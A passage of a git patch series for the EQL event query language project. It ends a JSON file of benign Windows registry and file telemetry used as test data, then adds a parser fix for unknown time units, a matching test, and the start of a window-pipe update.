"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", + "registry_value": "Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\ShowInSwitchers", + "registry_value": "ShowInSwitchers", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + 
"process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PositionObject", + "registry_value": "PositionObject", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\Version", + "registry_value": "Version", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": 
"C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", + "registry_value": "Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", + "timestamp": 131883574055580000, + "unique_pid": 
"{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574055580000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574055740000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574055740000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574055740000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574055740000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "timestamp": 131883574055740000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574055740000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + 
"registry_value": "NewClientID", + "timestamp": 131883574056050000, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883574056050000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "file", + "file_name": "AUDIODG.EXE-D0D776AC.pf", + "file_path": "C:\\Windows\\Prefetch\\AUDIODG.EXE-D0D776AC.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883574076520000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883574081680000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883574081680000, + "unique_pid": 
"{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883574085740000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574085740000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883574149810016, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": 
"vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883574149810016, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883574149810016, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574190430000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574190430000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574190430000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574191360000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574191520000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883574191990000, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883574191990000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": 
"svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_value": "VFUProvider", + "timestamp": 131883574200270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", + "registry_value": "StartTime", + "timestamp": 131883574200270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574216680000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 
131883574216680000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574216680000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574216830000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574216830000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574216830000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000B053C", + "registry_value": "W32:00000000000B053C", + "timestamp": 131883574217619984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000B053C", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000B053C\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574217619984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + } +] \ No newline at end of file From 84b689e03f479fa4bbd2a7a524e15b592b49bcca Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Fri, 18 Oct 2019 15:52:11 +0100 Subject: [PATCH 05/13] Small fix in parser for returning invalid time unit. --- eql/parser.py | 2 +- tests/test_parser.py | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/eql/parser.py b/eql/parser.py index d7540d8..fc908a8 100644 --- a/eql/parser.py +++ b/eql/parser.py @@ -347,7 +347,7 @@ def walk__time_range(self, node): if name.startswith(unit.rstrip('s') or 's'): return ast.TimeRange(datetime.timedelta(seconds=val * interval)), types.literal(types.NUMBER) - raise self._error(node.unit, "Unknown time unit") + raise self._error(node, "Unknown time unit") def walk__check_parentheses(self, node): """Check that parentheses are matching.""" 
diff --git a/tests/test_parser.py b/tests/test_parser.py index 202ab9f..0ba1544 100644 --- a/tests/test_parser.py +++ b/tests/test_parser.py @@ -276,6 +276,7 @@ def test_invalid_queries(self): 'sequence [process where pid == pid]', 'sequence [process where pid == pid] []', 'sequence with maxspan=false [process where true] [process where true]', + 'sequence with maxspan=10g [process where true] [process where true]', 'sequence with badparam=100 [process where true] [process where true]', # check that the same number of BYs are in every subquery 'sequence [file where true] [process where true] by field1', From b433376a7ffe7505a187a78dae5438bee562076a Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Fri, 18 Oct 2019 22:46:29 +0100 Subject: [PATCH 06/13] Updated window_pipe for EQL 0.7.0. Rolled back host_key removal. --- eql/engine.py | 100 +++++++++++++++++++++++++++++------- eql/etc/eql.ebnf | 1 + eql/pipes.py | 27 +++++++++- tests/test_parser.py | 3 ++ tests/test_python_engine.py | 41 +++++++++++++++ 5 files changed, 153 insertions(+), 19 deletions(-) diff --git a/eql/engine.py b/eql/engine.py index 79ab597..b89ccca 100644 --- a/eql/engine.py +++ b/eql/engine.py 
